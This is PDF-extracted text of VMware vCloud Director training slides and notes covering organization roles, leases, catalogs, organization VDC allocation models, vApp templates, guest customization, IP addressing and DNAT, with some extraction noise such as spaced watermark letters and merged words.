Creates and manages organization users, catalogs, and VMware vSphere®

vApp templates and organization VDC networks

Catalog Author Creates, manages, and uses catalogs and vApps

vApp Author Creates, manages, and uses vApps






s

5

vCloud Director uses roles, and their associated rights, to determine which users and groups can

perform which operations. System administrators can create and modify roles. System

administrators and organization administrators can assign roles to users and groups in an

organization.

vApp User Similar to vApp Author except that it cannot create vApp or change

CPU/memory/disk

Console Access Only Access to consoles of vApp virtual machines with no power functions

Organization PoliciesSlide 5-10

Leases, quotas, and limits help prevent users from depleting ormonopolizing an organizations resources.

Policy type Settings

Leases vApp runtime

vApp and vApp template storage

Storage cleanup location

Quotas Running virtual machines per user Stored virtual machines per user

Limits Resource intensive operations per user




Leases, quotas, and limits constrain the ability of organization users to consume storage and

processing resources. These settings prevent users from depleting or monopolizing an organization’s

resources.

Leases provide a level of control over an organization’s storage and compute resources by

specifying the maximum amount of time that vApps can be running and that vApps and vApptemplates can be stored.

The goal of a runtime lease is to prevent inactive vApps from consuming compute resources. For

example, if a user starts a vApp and goes on vacation without stopping it, the vApp continues to

consume resources. A runtime lease begins when a user starts a vApp. When a runtime lease

expires, vCloud Director stops the vApp.

The goal of a storage lease is to prevent unused vApps and vApp templates from consuming storageresources. A vApp storage lease begins when a user stops the vApp. Storage leases do not affect

running vApps. A vApp template storage lease begins when a user adds the vApp template to a

vApp, adds the vApp template to a workspace, downloads, copies, or moves the vApp template.

When a storage lease expires, vCloud Director marks the vApp or vApp template as expired, or

deletes the vApp or vApp template, depending on the organization policy that you set.

p p

Resource intensive operations per organization

Simultaneous connections per virtual machine

Quotas determine how many virtual machines each user in the organization can store and power on

in the organization’s VDCs. The quotas that administrators specify act as the default for all new

users added to the organization.

Limits prevent resource-intensive operations from affecting all the users in an organization and also

provide a defense against denial-of-service (DoS) attacks. Certain vCloud Director operations are

more resource intensive than others. An example of a resource-intensive operation is the copying or

moving of a vApp. For performance or security reasons, you can also limit the number ofsimultaneous connections to a virtual machine from the vCloud Director remote console. Limiting

the number of simultaneous connections does not limit Virtual Network Computing or Remote

Desktop Protocol connections. Unlike the other usage policies, limits cannot be set by organization

administrators. They must be set by system administrators and cannot be modified by organization

administrators.






s

5

Expired Items Management (1)Slide 5-11

vApps and vApp templates whose storage leases expire are handled asconfigured under Leases.

These vApps are either moved to an expired holding area or deleted.

The vCloud Director system administrator and the organizationadministrator have the ability to restore to the organization a vApp thatis stored in an Expired Items storage area.




Leases combined with management of expired items enables vCloud Director administrators and

organization administrators to prevent individual users from consuming too much of a cloud’s

resources.


After a vApp stops running, the clock starts for how long it will remain inthe users My Cloud.

This type of management can be used to keep organizations and usersfrom cluttering the system with too many vApps and wasting resources.






s

5


After a vApp or vApp template has been moved into Expired Items,either the cloud system administrator or the organization administratorcan renew it.

The Expired Items inventory appears under My Cloud.

vApps can also be deleted from Expired Items.




CatalogsSlide 5-14

Catalog Objects

vApp Templates

Catalogs store the following:

vApp templates, which are used todeploy workloads to user clouds

Media (ISO files and FLP files) thatcan be inserted into CD/DVD anddiskette drives on virtual machines

Media can also include other files,such as scripts.

Catalogs can be shared with all

users in the organization or withspecific users.

Catalogs can be shared with otherorganizations.

Windows Template

Web Server vApps

Database vApps






s

5

vCloud Director includes a content repository. The content repository is a component in the vCloud

Director storage subsystem. The content repository provides an abstraction to the underlying

datastores and offers features to store, search, retrieve, and remove content.

Content is delivered to consumers in the form of catalogs. A catalog is a container for vApp

templates and media files in an organization.

Catalogs can be shared, so the vApp templates in them are available to other users in the

organization. Catalogs can also be published, so members of other organizations can have read

access to the vApps, provided the organization is configured to allow publishing.

Media

Catalogs can be published to othervCloud Director clouds.

Catalog AvailabilitySlide 5-15

Catalogs are made available in four ways:

Private: Available to the owner or creator of the catalog only

Public: Available to other organizations in the cloud

Shared: Available to other specific users in your organization oravailable to other organizations in your cloud

Published: Available to subscribers in other vCloud Director clouds




Organization Catalog SharingSlide 5-16

The system administrator allows or disallows public sharing andpublishing of organization catalogs.

If sharing is allowed, the organization catalogs can be shared as visible to

other organizations. Catalogs can be made public to specific organizations or to all

organizations.

Catalogs can still be shared within an organization even if sharing withother organizations is not allowed.

Sharing can be set or changed at any time.





i r e c t or Or g ani z a t i on s

5

Organization Catalog PublishingSlide 5-17

Publishing allows a catalog to be shared with organizations in othervCloud Director clouds.

The system administrator also controls whether an organization can

subscribe to catalogs that are externally published.

Publishing can be set or changed at any time.




Catalog Best PracticesSlide 5-18

Create an administration organization to do the following:

Share public catalogs that offer official build templates to the organizationadministrators of all organizations

For each consumer organization, follow these practices:

Create a shared catalog for local templates

Use the shared catalog provided by the Administration organization tocreate standard templates

Recognize that only the Organization Administrator role and the vCloudDirector system administrator can view shared and published catalogs

Be very selective about whom you allow to publish catalogs to externalclouds.

Be very selective about whom you allow to subscribe from externalclouds.






5



Create a vCloud Director organization

Add a catalog to an organization




Lesson 2: Organization Virtual Data CentersSlide 5-20

Lesson 2:

Organization Virtual Data Centers






5



objectives:

Create an organization virtual data center (VDC)

Configure organization VDC networking




Organization VDCsSlide 5-22

An organization VDC is a subset of the resources in a provider VDC.

Provider VDC resources are allocated to tenants in the form oforganization VDCs.

Before you can create an organization VDC, you must create anorganization.

Each organization can have multiple organization VDCs.

Each organization VDC can belong to only a single organization.

vApps, vApp templates, and catalogs cannot be created in an

organization until an organization VDC exists.




V Mw ar ev C l o u d Di r e c t or Or g ani z a t i on s

5

An organization VDC provides resources to an organization and is partitioned from a provider VDC.

Organization VDCs provide an environment where virtual systems can be stored, deployed, and

operated. They also provide storage for virtual media, such as floppy disks and CDs.

A single organization can have multiple organization VDCs associated with it.

Organization VDCs are used by vCloud Director to partition provider VDCs and allocate resources

to an organization. vCloud Director uses VMware vSphere® resource pools as the basic construct to

partition these resources.

You must create the organization before you can create an organization VDC. Each organization can

have multiple organization VDCs. But each organization VDC is local to only one organization.

When creating an organization VDC, you must first select the provider VDC that will provide

resources. From a vSphere perspective, both provider and organization VDCs are resource pools andhave a parent-child relationship.

Purpose of an Organization VDCSlide 5-23

Organization VDCs enable the cloud providerto securely share provider VDCs resourceswith multiple tenants. The provider can do so

with the following: Predefined allocations

Ensured control of the tenants performanceand capacity requirements

Organization A

VDC2 (Tier2)VDC1 (Tier1)

vApp

A single cloud tenant can have multipleorganization VDCs. The advantages include:

They consume multiple classes with differingSLAs.

Th t i b d t d d




The organization VDC enables the cloud provider to share provider VDC resources with multiple

tenants. Organization VDCs maintain security, enable the provider to set predefined allocations, and

ensure that the tenant’s performance and capacity requirements can be controlled.

Tenants do not have the ability to see the actual resources in the provider VDC. Their visibility is

only into which resources are available in the organization VDC.Like a provider VDC, the organization VDC is a container for resources, but the way that resources

are allocated can be specified. A network pool can be added to an organization VDC with limits on

the number of networks that can be created. You can also specify the maximum amount of storage

that the organization VDC can consume.

The cost is based on computed needs.

The cloud consumer or user sees theorganization VDCs but not the underlyingprovider VDCs.

Organization VDCs and Provider VDCsSlide 5-24

Each organization can have multiple organization VDCs.

Each organization VDC can use resources from a single provider VDC.

Multiple organization VDC can use resources from the same providerVDC.

You cannot create an organization VDC until a provider VDC exists.

VDC-

A-1

VDC-

A-2

VDC-

B-1

VDC-

B-2VDC-

C-1

Gold provider VDC Silver provider VDC Bronze provider VDC

organization Corganization Borganization A





5

You must create your provider VDCs before you can create your organization VDCs. Each

organization can have multiple organization VDCs. Each organization VDC can be connected to

only one provider VDC. But each provider VDC can serve resources to multiple organization

VDCs.

Like a provider VDC, the organization VDC is a container for resources. But the way that resourcesare allocated from an organization VDC can be specified. A network pool can be added to an

organization VDC with limits on the number of networks that can be created. You can also specify

the maximum amount of storage that the organization VDC can consume.

The organization VDC inherits availability characteristics from the provider VDC to which it

belongs.

p p p

Allocation ModelsSlide 5-25

Each organization is created based on an allocation model.

The allocation model controls how that organization will be allowed toconsume resources.

You can choose from three models:

Pay-as-you-go

Allocation pool

Reservation pool

Each organization can be created with only one model.




When creating an organization VDC, choosing an appropriate allocation model is important. The

allocation model not only determines how the provider VDC resources are committed to the

organization VDCs, but also how the provider bills the customer for those resources.

5

Pay-As-You-Go ModelSlide 5-26





5

The pay-as-you-go model is the easiest model to understand and administer. The easiest way to

think of pay-as-you-go is that customers pay for what they get. When a vApp powers on, the

resources are committed. If a vApp is not powered on, then the customer is not billed for resources.

Even though the customer is billed as soon as a vApp is powered on, only a percentage of the

resources are guaranteed. If you want to create a high-tier service offering, the pay-as-you-go modelis where the provider can increase the guaranteed resources.

The pay-as-you-go model is the only model where you can specify the speed of virtual CPUs in the

vApp.

The pay-as-you-go model has these characteristics:

• Requires no up-front resource allocation.

• Resources are committed only when users create vApps in the organization VDC.

• You can set limits to cap usage.

• You can also specify a percentage of resources to guarantee, which allows you to overcommit

resources.

Allocation Pool ModelSlide 5-27




The allocation pool model configures a virtual container of resources.

The allocation pool model allocates a subset of resources, but it guarantees to a tenant only a

percentage of what has been allocated. Thus, the provider has the ability to overcommit resources

when using the allocation pool model.

The allocation pool model has these characteristics:

• Only a percentage of the allocated resources are committed to the organization VDC.

• You can specify the percentage, which allows you to overcommit resources.

• Advanced resource management controls, such as shares and reservations, are managed by the

cloud operator. These types of control allow for more coherent resource management across

organizations.

5

Reservation Pool ModelSlide 5-28





5

The reservation pool model configures a physical container of resources. Think of this model as a

model where the customer “rents hardware for their exclusive use.”

The reservation pool model should be the most expensive allocation model offered to customers.

The customer is in complete control of the resources that they use, and all resources are guaranteed.

The reservation pool model also offers customers the greatest amount of control. They have thesame controls that a vSphere administrator would have over resource pool settings. Thus, over-

commitment is possible, but it is controlled by the customer.

The reservation pool model has these characteristics:

• All allocated resources are immediately committed to the organization VDC.

• One-hundred percent of all resources specified are guaranteed.

• No other organization can share these resources.

• Organization administrators can use advanced vSphere resource management controls, such as

shares and reservations, to manage overcommitment of resources between their workloads.

Organization VDC Allocation Model ComparisonSlide 5-29

Pay-as-you-go:

Resources are committed to the virtual machineon virtual machine creation in the organization VDC.

Provider-controlled overcommitment per virtual machine. Easiest to manage, good starting point.

Allocation pool:

Capacity is reserved for the organization VDC,with the ability for provider-controlled overcommitment for

the entire organization VDC.

Reservation pool (special case allocation pool):

All provider VDC resources that you allocate arecommitted to the organization VDC.

The pool expandsto accommodateresources reservedon demand.

vApp

vApp

Actual

Guarantee

OvercommitRange

Guarantee




Tenant-controlled overcommitment for the entire organizationVDC.

Actual

5

Virtual Machine Admission ControlSlide 5-30

Pay-as-you-go:

CPU- and memory-based admission control:

- Virtual machines cannot be deployed to a pay-as-you-go VDC unless

enough CPU and RAM are available to meet the reservation requirementsfor the virtual machine.

Allocation pool:

Memory-based admission control

Virtual machines cannot be deployed to an allocation pool VDC unlessenough RAM is available to meet the reservation requirements for the virtualmachine.

Reservation pool:

No admission control:

- All virtual machine deployments will be completed. Resource contention and

starvation must be managed by the tenant.




V Mw ar ev C l o u d Di

r e c t or Or g ani z a t i on s

When choosing an allocation model, you should consider virtual machine admission control.

Admission control is whether a VMware vSphere® Distributed Resource Scheduler™ cluster allows

a virtual machine to be powered on and is based on available resources. The allocation models

directly affect how admission control is used in the vSphere DRS cluster.

Organization VDC Best PracticesSlide 5-31

When creating organization VDCs, VMware® recommends that you donot mix allocation models in a provider VDC.

Mixing resource allocation models in the provider VDC across

organizations can result in unpredictable resource consumption,making SLA management difficult.

Enable thin provisioning to reduce storage consumption by committingresources only on demand.

Enable fast provisioning to enable the use of vSphere linked clones.




An organization VDC requires storage space for vApps and vApp templates. You can allocate

storage from the space available on provider VDC datastores.

Thin provisioning can help prevent overallocating storage and save storage space. For a virtual

machine with a thin virtual disk, VMware® ESXi™ provisions the entire space required for the

disk’s current and future activities. ESXi commits only as much storage space as the disk needs forits initial operations.

Fast provisioning saves time by using vSphere linked clones for certain operations.

Fast provisioning requires VMware® vCenter Server™ 5.0 or later and ESXi 5.0 or later hosts. If

the provider VDC on which the organization VDC is based contains any ESX/ESXi 4.x hosts, you

must disable fast provisioning. If the provider VDC on which the organization VDC is based

contains any VMware vSphere® VMFS datastores connected to more than 32 hosts, powering on

virtual machines might fail. Make sure that datastores are connected to a maximum of 32 hosts.

5

Organization VDCs and NetworkingSlide 5-32

Organization networks and organization edge gateways are part oforganization VDCs.

When you create an organization VDC, you have the opportunity to

create networks and gateways. You can add networks and gateways after the organization VDC has

been created.

Organization networks and organization gateways can be shared withother organization VDCs in the organization.





The networking module discussed organization VDC networks in detail. Typically most

organizations have these requirements:

• An edge gateway device that connects to an external network

• A routed organization VDC network

In the most basic scenario, an organization topology is defined by an edge gateway connecting to an

external network and a single organization VDC network. vApp networks are routed and connect to

the single organization VDC network.

For the organization VDC network, you must provide a range of IP addresses and associated

network information. Because an organization VDC network is a private network, you can use RFC

1918 addresses for DHCP and static IP address pools. Typically, a full RFC 1918 class C is used for

the private network IP pool.You can create an edge gateway in either a compact or a full configuration. The full configuration

provides increased capacity and performance. The compact configuration requires less memory and

fewer compute resources. All services are supported in either configuration. You can enable either

configuration for high availability, which enables automatic failover of the edge gateway device to a

backup instance that is running on a separate virtual machine.

Considerations for Organization VDC NetworkingSlide 5-33

Most organizations require a minimum of one edge gateway thatconnects to an external network.

Most organizations require at least one organization VDC network

Use a logical naming convention to identify networks for ease ofmanagement:

Example: <organization_name>-<network_name_or_purpose>

Each organization VDC has a single network pool.

A system administrator selects the pool and stipulates the quota.

Select compact or full configuration for edge gateways based on trafficdemands.




5

Lab 4: Configuring VMware vCloud Director OrganizationsSlide 5-34

Configure vCloud Director organizations







Create an organization virtual data center (VDC)

Configure organization VDC networking




5

Lesson 3: vApp TemplatesSlide 5-36

Lesson 3:

vApp Templates







objectives:

Install the Client Integration Plug-In into the VMware vSphere® Client

Upload a virtual machine into vSphere from a local OVF template

Import a virtual machine from vSphere as a vApp template

Upload a virtual machine into vCloud Director from a local OVFtemplate




5

vApp TemplatesSlide 5-38

A vCloud Director virtual appliance (vApp) template is a predefinedpackage of virtual machines and networks that you can use to rapidlyinstantiate vCloud Director vApps.

Install and preconfigure guest operating systems in the vApp template.

Preconfigure networks in the vApp template.

You cannot power on a vApp template.

vApp Template vApp





A vApp template is a virtual machine image that is loaded with an operating system, applications,

and data. These templates ensure that virtual machines are consistently configured across an entire

organization.

You can create a vApp template by importing a virtual machine from the vSphere DRS cluster or

from a vApp in the data center or uploading by using a file that uses the Image Transfer Service. If

vApp templates are not in Open Virtualization Format (OVF) format, they are converted to OVF

format immediately. You can use the vCloud Director import functions to import a vSphere virtual

machine to vCloud Director as either a vApp or a vApp template. But to import a VMware

vSphere® vApp™ to vCloud Director, you must export it from vSphere in OVF format, then upload

the exported OVF to vCloud Director. Only system administrators can import a virtual machine

from vCenter Server to vCloud Director.

A vApp template is an immutable vApp because it cannot be deployed and so cannot be poweredon. You create a vApp instance from the vApp template that can be deployed and powered on.

Populating CatalogsSlide 5-39

Options for adding media to a catalog:

Upload an ISO or FLP image file.

Import a media file from a vSphere datastore.*

Copy or move a media file from one catalog to another.

Options for adding vApp templates to a catalog:

Upload an Open Virtualization Format (OVF) package.

Import a virtual machine from vSphere.*

Copy or move a vApp template from one catalog to another.

Create a vApp from a template, modify it, and save it as a template.

Create a vApp from the beginning and save it as a template.

* Requires system administrator permissions




vCloud Director offers several ways to populate catalogs with vApp templates and media. These

options are available based on user roles and their associated rights. For example, only system

administrators can import a virtual machine or media file from vSphere.

5

Importing vApp TemplatesSlide 5-40

vSphere virtual machines can be imported into vCloud Director:

Only the vCloud Director system administrator role has the right to upload avSphere virtual machine into vCloud Director.

Virtual machines can be uploaded into a catalog as vApp templates or intoMy Cloud as vApps.

OVF templates can be uploaded into a catalog as a vApp template.

OVF templates can also be uploaded as a vApp.

Any organization user with sufficient rights can upload OVF templates.

Uploading templates removes any reliance on a system administrator to

interact with vSphere.





e c t or Or g ani z a t i on s

You can deploy an OVF template in vSphere and then import the resulting virtual machine as a

vApp (in My Cloud) or vApp template in an organization catalog. Only the system administrator can

interact with vSphere to deploy the OVF template and then import the virtual machine.

Not all vSphere OVF templates can be imported directly into vCloud Director. vSphere supports

some items in the template that vCloud Director does not support. A workaround is to open the file

with a text editor and remove the items that vCloud Director does not support. Most of these items

are related to custom settings.

A user with sufficient privilege can upload an OVF template that is stored on their desktop computer

to an organization catalog as a vApp template.

Chain-Length Problems (1)Slide 5-41

Each time a vApp is deployed from a vApp template, a linked clone iscreated.

Linked clones are disk-deduplicated copies of the vApp template.

These copies are based on vSphere snapshots. Only the data unique to this vApp is stored separately.

Only 31 linked-clone copies of a vApp can exist. Then a new shadow virtualmachine is created for each virtual machine in the vApp and a new chain isstarted.

A large number of linked clones can slow performance.

Only the vCloud Director system administrator can see the chain lengthof a virtual machine and issue a command to consolidate.




5


You can see the chain length on the properties of a virtual machine in

a template that is stored in a catalog.







The command to consolidate is available when you right-click a virtualmachine in a template.

You also can view shadow virtual machines.




5

Lab 5: Creating VMware vCloud Director vApp TemplatesSlide 5-44

Create vCloud Director vApp templates








Install the Client Integration Plug-In into the VMware vSphere® Client

Upload a virtual machine into vSphere from a local OVF template

Import a virtual machine from vSphere as a vApp template

Upload a virtual machine into vCloud Director from a local OVFtemplate




5

Lesson 4: Building and Publishing vAppsSlide 5-46

Lesson 4:

Building and Publishing vApps







objectives:

Build a vApp

Publish a vApp to a local organization catalog




V

5

vApps (1)Slide 5-48

A vApp is a package of IT services.

The package includes:

One or more preconfigured virtual machines running the applications

included in a service A vApp network for communication between virtual machines

Metadata for deployment instructions and runtime policies

vApp

OVF descriptor

databasedatabase

virtualmachinevirtual

machine

app server app server


machine

app server app server


machine

vApp

OVF descriptor

database

virtualmachine

app server

virtualmachine

app server

virtualmachine




VMw ar ev C l o u d Di r e c t or Or g ani z a t i on s

vCloud Director delivers IT services in packages that are called vApps. vApps are composed of one

or more virtual machines. These virtual machines communicate over networks included in the

package and use resources and services in the deployed environment. The package also includes an

OVF descriptor, which provides general application information, hardware requirements,

deployment instructions, and policies that are enforced during runtime.

A vCloud vApp is instantiated and consumed in vCloud differently than in a vSphere environment.

As discussed earlier, a vApp is a container for a distributed software solution and is the standard unit

of deployment in vCloud Director. It has power-on operations, consists of one or more virtual

machines, and can be imported or exported as an OVF package. A vCloud vApp might have

additional vCloud specific constructs, such as vApp networks.

vApps are the lowest unit of work in vCloud Director. If a service requires only one virtual machine,

you must create a vApp for that virtual machine.

In vCloud Director, you can create a vApp by cloning a template in a catalog or by creating a new

one. After you have created the vApp, you can add, remove, or modify the virtual machines in it.

vApp property settings enable you to control the behavior of virtual machines when you start and

stop the vApp. For example, you can set the order in which the virtual machines power on and off.

vApps (2)Slide 5-49

A vApp is deployed from a vApp template.

vApps simplify the deployment and ongoing management of an n-tierapplication.

vApps can contain one or many virtual machines. vApps encapsulate not only virtual machines but also their

interdependencies and resource allocations.

OVF is the distribution format for vApps.

vApp Template vApp




You can create a vApp based on a vApp template stored in a catalog to which you have access. A

vApp in vCloud Director is a logical construct used to describe a set of virtual machines.

vApps simplify the requirement for the deployment and ongoing management of an n-tier

application in multiple virtual machines by encapsulating them in a single virtual service entity. A

vApp has the same basic operations as a virtual machine and can contain one or more virtual

machines.

vApps encapsulate not only virtual machines but also their interdependencies and resource

allocations, which enables single-step power operations, cloning, deployment, and monitoring of the

entire application. If the virtual machine is based on an OVF file that includes OVF properties for

customization, those properties are retained in the vApp. If any of those properties are user-

configurable, you can specify the values in the virtual machines properties pane after you add it to

the vApp.

The distribution format for vApps is OVF, implying that they can be imported and exported like

OVF virtual machines.

V M

5

vApp Custom Guest PropertiesSlide 5-50

The vApp custom guest properties

feature the following:

Developers and other users can useOVF descriptors to easily pass userdata into guest operating systems.

Benefits:

Easier postdeployment configurationand provisioning of identity to virtualmachine and vApps

Provides functionality to bootstrap awidevariety of guest customizationsolutions

vApps

DeployOVF package.

OVF package

1

3

Deploymentconfiguration

2

vSphere

vApp vApp





The vApp custom guest properties feature allows users to pass custom data into the guest operating

system of vApps that are deployed in vCloud Director. The custom guest properties feature is useful

for an application developer and application owner because the application can be customized by

users in ways beyond guest customization that is available in earlier versions of vCloud Director.

Steps involved in deploying a custom guest vApp include the following:

1. Template creation by the author:

• Author declares OVF properties

• Author installs guest software and scripts

• Author exports template as an OVF package

2. Deployment by user:

• User prompted for deployment-time values

• User powers on vApp

The deployment works after steps 1 and 2. The OVF environment is generated by vCenter Server,

and guest scripts run and customize software.

Considerations for vAppsSlide 5-51

General design considerations:

Include one virtual CPU. Add vCPUs as needed.

Use the latest version of VMware® Tools.

Use default shares, reservations, and limits. Use vmxnet3 network adapters.

Network design considerations:

Each vApp network consumes processor and memory resources and anetwork from the pool.

Each VMware® vShield Edge that is deployed allocates an IP from the

static pool available on the organization VDC network.




Be aware of the following general design considerations for vApps:

• Default to one virtual CPU unless requirements call for more virtual CPUs. An example of a

need for multiple virtual CPUs would be a multithreaded application virtual machine.

• Always install the latest version of VMware® Tools™.

• Always provision a 32-bit virtual machine unless a 64-bit virtual machine is required.

• Deploy virtual machines by using default shares, reservations, and limits settings unless you

have a clear requirement for doing otherwise.

• For virtual network adaptors, use VMXNET3 if supported.

• Secure virtual machines as you would secure physical machines.

• Use standard virtual machine naming conventions.

V M

5

Lab 6: Building and Publishing VMware vCloud Director vAppsSlide 5-52

Build and publish vCloud Director vApps







Build a vApp

Publish a vApp to a local organization catalog




V Mw

5

Lesson 5: Deploying and Running vAppsSlide 5-54

Lesson 5:

Deploying and Running vApps




w ar ev C l o u d Di r e

c t or Or g ani z a t i on s



objectives:

Copy a vApp from a public catalog to the local organization catalog

Deploy a vApp from the local organization catalog

Configure and start vApps








V Mw

5

Guest CustomizationSlide 5-58

You can configure guest customization settings for any stopped virtualmachine.

Guest customization can be used for the following tasks:

Configure the host name Enable or disable SID generation (for Windows guests)

Set the administrator password

Specify a customization script to be executed

Guest customization requires a virtual machine reboot to finish.




w ar ev C l o u d Di r e


To ensure that the virtual machines in vApp templates are unique upon deployment, vCloud Director

includes the ability to customize guests directly from the organization Web console. Customization

occurs when powering on the virtual machine.

vCloud Director can customize the network settings of the guest operating system of a virtual

machine created from a vApp template. When you customize your guest operating system, you can

create and deploy multiple unique virtual machines based on the same vApp template withoutmachine name or network conflicts.

When you configure a vApp template with the prerequisites for guest customization and add a

virtual machine to a vApp based on that template, vCloud Director creates a package with guest

customization tools. When you deploy and power on the virtual machine for the first time, vCloud

Director copies the package, runs the tools, and deletes the package from the virtual machine.

Before vCloud Director can perform guest customization on virtual machines with Windows 2000,XP, or 2003 guest operating systems, a system administrator of VMware vCloud® must create a

corresponding Microsoft Sysprep deployment package in the vCloud Director deployment

environment. For more information about creating Sysprep deployment packages, see vCloud

Director Administrator’s Guide at www.vmware.com/support/pubs/vcd_pubs.html.

Hardware Customization (1)Slide 5-59

You can change the hardware settings on a stopped virtual machine.

You might be able to hot-add hardware to running virtual machines.




For each virtual machine in a vApp, you can change the hardware settings. You must have vApp

author privileges and above to update or change the vApp hardware configuration.

V Mw a

5

Hardware Customization (2)Slide 5-60

You can change the vApp network, create a new vApp network, orconnect the vApp directly to an organization VDC network.

You can specify the IP addressing used by each virtual machine.

Static IP use requires enabling of guest customizations.




ar ev C l o u d Di r e


When creating a vApp, preparing a vApp for publication to a catalog, or when customizing a vApp

for startup, you can change how the vApp connects to the organization infrastructure. vApps

typically connect to an organization VDC network, either through a routed vApp network edge or

directly. To direct-connect a vApp to an organization VDC network, you must select the Add

network option in the network drop-down menu, and then select one or more existing organization

VDC networks to be added to the vApp. After you have created or selected the vApp networkconfiguration, you can configure IP parameters.

IP Addresses and vApp ConnectionsSlide 5-61

vApp

192.168.210.2

(Static)

vAppNetwork

Organization VDC Network (192.168.11.0/24)

192.168.210.204

(Manual)

192.168.210.103

(DHCP)

vApp

192.168.11.2

(Static)

vAppNetwork

Organization VDC Network (192.168.11.0/24)

192.168.11.204

(Manual)

192.168.11.103

(DHCP)

DHCP / Static Pool

DHCP / Static Pool

Edge Gateway

Edge Gateway

vShield Edge

Routed vApp

Direct-Connect vApp




vCloud Director uses guest customization when it deploys virtual machines inside vApps to control

IP addressing. Three types of IP addressing exist: static, manual, and DHCP.

DHCP addressing is standard DHCP. The virtual machine guest operating system must be

configured to receive a DHCP address. vCloud Director does not use guest customization to enforce

the configuration of the virtual machine as a DHCP network client. If a virtual machine is set to use

DHCP, you must either have the network VMware® vShield™ device configured to support DHCPservices or you must directly attach the vApp network to a higher network that has an external

DHCP server.

If a virtual machine has been assigned a DHCP address, you cannot configure an external network

address translation (NAT) IP address on the organization VDC network.

Static addressing is similar in operation to DHCP. When you create the network, you set a static

range of IP addresses. vCloud Director pulls IP addresses out of the static range in sequential order.Then vCloud Director uses guest customization to manually set the IP address in the virtual machine

to the selected static address.

V Mw a

5

Static addresses have a major advantage over DHCP. If you set a virtual machine to a static IPaddress, then vCloud Director assigns an external NAT IP address on the organization VDC network

that the vApp is attached to. This automatic assignment of external NAT IP addresses greatly

simplifies NAT operations.

Manual IP addresses are where vCloud Director uses the address that the administrator manually

specifies for a virtual machine. vCloud Director uses guest customization to configure the IP address

in the virtual machine. If a virtual machine has a manual IP address assigned, it does not

automatically receive an external NAT IP address on the organization VDC network. However, thevCloud Director administrator can manually set the external NAT IP address for a virtual machine

with a manual IP address configuration.




r ev C l o u d Di r e








Copy a vApp from a public catalog to the local organization catalog

Deploy a vApp from the local organization catalog

Configure and start vApps




V

Mw ar e

5

Lesson 6: Additional Organization VDC NetworkingSlide 5-65

Lesson 6:

Additional Organization VDC Networking




ev C l o u d Di r e




objectives:

Create a direct-connect organization VDC network

Create a routed organization VDC network

Create a suballocated IP pool for an organization VDC network

Create a fenced vApp

Create a destination network address translation (DNAT) mapping




V

Mw ar e

5

Direct-Connect Organization VDC Networks: ReviewSlide 5-67

A system administrator must create a direct-connect network on behalfof an organization.

A direct-connect organization VDC network is an extension of an externalnetwork and does not connect to the organization VDC edge gateway.

Organization administrators cannot create, configure, or manage a direct-connect network.

Network services for a direct-connect network are provided from theexternal network created and managed by the system administrators:

- Including IP address services, DNS configuration, and subnet range

All direct-connect networks connected to an external network share the

same layer 2 broadcast domain. Exercise care when using direct-connect organization VDC networks.

Use fencing to isolate MAC and IP addresses.




v C l o u d Di r e


Direct-Connect Organization VDC Network: ExampleSlide 5-68

A system administrator can create a direct-connect organization VDC network on behalf of an

External Public 172.20.11.0/24

RD-vApp1

RD External172.30.1.0/24

172.30.110.0/24

NAT

RD Gateway 172.20.11.201

RD-vApp2

172.30.120.0/24

NAT

RD Services NetworkDirect Connect

RD-Services

172.20.10.0/24

Fenced




organization. A direct-connect organization VDC network is a literal extension of an external

network and cannot be managed by anyone other than a system administrator. A direct-connect

organization VDC network does not connect to the organization edge gateway.

A direct-connect organization VDC network shares the same layer-2 broadcast domain as the

external network it connects to. Care should be taken when using direct-connect organization VDCnetworks. Although an organization administrator cannot directly manage the network, the

organization administrator can direct-connect a vApp to the network, essentially exposing virtual

machines to the external network broadcast domain and consuming external network resources.

Direct-connect vApps should be fenced, so that the MAC and IP addresses of the contained virtual

machines are isolated from the broadcast domain to avoid conflicts.



Suballocated IP Pools and DNAT: ReviewSlide 5-70

As the system administrator, you can configure suballocation IP pools when the organization VDC

i t d Th t d i i t t l fi b ll ti IP l f i ti

External IP addresses can be mapped to internal hosts across anorganization VDC edge gateway.

The external address or range must be suballocated on the externalnetwork by a system administrator.

After a suballocated IP pool has been created, the organizationadministrator can use those IP addresses for NAT purposes.

DNAT is a method by which an organization gateway transforms thedestination address of packets.

The edge gateway receives packets for the external IP of the DNATmapping by associating its external interface MAC address with that IP

address through an Address Resolution Protocol response. The edge gateway modifies the IP headers so that the packets are targetedto some address on an interior network.

The edge gateway forwards those packets to the target host or to the nexthop.

Protocol filtering can be applied.




is created. The system administrator can also configure suballocation IP pools for an organization

VDC later. If an organization must host externally accessible services by using a destination network

address translation (DNAT) mapping through the edge gateway firewall, the system administrator

must suballocate one or more IP addresses for use by the organization for NAT mapping operations.

To facilitate the hosting of inbound connections, an organization administrator can create DNATrules that map external IP addresses or IP address ranges to internal addresses. Allocation of

external addresses must be explicitly configured by a system administrator. After a suballocation IP

pool has been created by a system administrator, the organization administrator can create whatever

mappings are necessary.

When DNAT rules are defined, the edge gateway will issue Address Resolution Protocol (ARP)

responses on the external interface for each destination address. Through the ARP advertisement, all

packets destined for any DNAT-defined external address will be delivered to the edge gateway.

Upon receiving a packet with a destination address matching a DNAT rule, the edge gateway

transforms the destination address based on the DNAT rule configuration, updates IP header

checksum, and then forwards the packet to the interior host or the next interior hop.



Lab 9: Hosting Inbound ServicesSlide 5-72

Configure vApps and Networks for Hosting Inbound Services







In VMware vCloud® infrastructures, IT services are delivered throughorganizations.

Organizations provide secure, controlled, self-service environments forconsumers to access IT services.

Organizations might be connected to cloudwide LDAP systems or havean organization-only LDAP system.

Organizations must be created before you create organization VDCsand organization VDC networks.

Catalogs are libraries that are normally restricted to a singleorganization but might be opened up to an entire cloud.

A catalog provides organization users with a library of vApp templatesand media that they can use to create vApps and install applications onvirtual machines.

vApps are based on vApp templates that are stored in the catalog.

Questions?







Course Introduction






Managing VMware vCloud Director

Resources








6

ImportanceSlide 6-3

VMware vCloud Director® is designed to be a secure environment.

vCloud Director administrators must be able to use security roles

and LDAP integration to keep VMware vCloud® secure.



Module 6 VMware vCloud Director Basic Security 233

V Mw ar e

v C l o u d Di r e c t or B a s

i c S e c ur i t y


Lesson 1: Security Roles

Lesson 2: LDAP Integration




V

6

Lesson 1: Security RolesSlide 6-5

Lesson 1:

Security Roles




VMw ar e


i c S e c ur i t y



objective:

Create and manage security roles in vCloud Director




V

6

vCloud Director SecuritySlide 6-7

VMware® vCloud Director® security architecture identifies users from five possible locations:

• Locally defined in vCloud Director

vCloud Director securityidentifies users from fivepossible locations:

vCloud Director local

vCloud Directorimported from LDAP

